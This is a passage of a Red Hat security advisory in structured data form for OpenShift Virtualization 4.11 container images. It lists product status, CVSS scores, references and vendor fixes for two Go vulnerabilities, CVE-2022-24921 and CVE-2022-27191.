"8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64", "8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2022-24921", }, { category: "external", summary: "RHBZ#2064857", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2064857", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2022-24921", url: "https://www.cve.org/CVERecord?id=CVE-2022-24921", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2022-24921", url: "https://nvd.nist.gov/vuln/detail/CVE-2022-24921", }, { category: "external", summary: "https://groups.google.com/g/golang-announce/c/RP1hfrBYVuk", url: "https://groups.google.com/g/golang-announce/c/RP1hfrBYVuk", }, ], release_date: "2022-03-03T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2022-09-14T19:28:51+00:00", details: "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64", "8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64", "8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2022:6526", }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 7.5, baseSeverity: "HIGH", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", version: "3.1", }, products: [ "8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64", "8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64", "8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64", "8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64", "8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64", "8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64", "8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64", "8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "golang: regexp: stack exhaustion via a deeply nested expression", }, { cve: "CVE-2022-27191", cwe: { id: "CWE-327", name: "Use of a Broken or Risky Cryptographic Algorithm", }, discovery_date: "2022-03-16T00:00:00+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64", "8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64", "8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64", "8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64", "8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64", "8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64", "8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2064702", }, ], notes: [ { category: "description", text: "A broken cryptographic algorithm flaw was found in golang.org/x/crypto/ssh. This issue causes a client to fail authentication with RSA keys to servers that reject signature algorithms based on SHA-2, enabling an attacker to crash the server, resulting in a loss of availability.", title: "Vulnerability description", }, { category: "summary", text: "golang: crash in a golang.org/x/crypto/ssh server", title: "Vulnerability summary", }, { category: "other", text: "In OpenShift Container Platform (OCP) the vulnerable golang.org/x/crypto/ssh package is bundled in many components. The affected code is in the SSH server portion that is not used, hence the impact by this vulnerability is reduced. Additionally the OCP installer components, that also bundle vulnerable golang.org/x/crypto/ssh package, are used only during the cluster installation process, hence for already deployed and running OCP clusters the installer components are considered as affected by this vulnerability but not impacted.", title: "Statement", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64", ], known_not_affected: [ "8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64", "8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64", "8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64", "8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64", "8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64", "8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64", "8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2022-27191", }, { category: "external", summary: "RHBZ#2064702", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2064702", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2022-27191", url: "https://www.cve.org/CVERecord?id=CVE-2022-27191", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2022-27191", url: "https://nvd.nist.gov/vuln/detail/CVE-2022-27191", }, { category: "external", summary: "https://groups.google.com/g/golang-announce/c/-cp44ypCT5s/m/wmegxkLiAQAJ", url: "https://groups.google.com/g/golang-announce/c/-cp44ypCT5s/m/wmegxkLiAQAJ", }, ], release_date: "2022-03-15T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2022-09-14T19:28:51+00:00", details: "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2022:6526", }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 7.5, baseSeverity: "HIGH", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", version: "3.1", }, products: [ "8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64", "8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64", 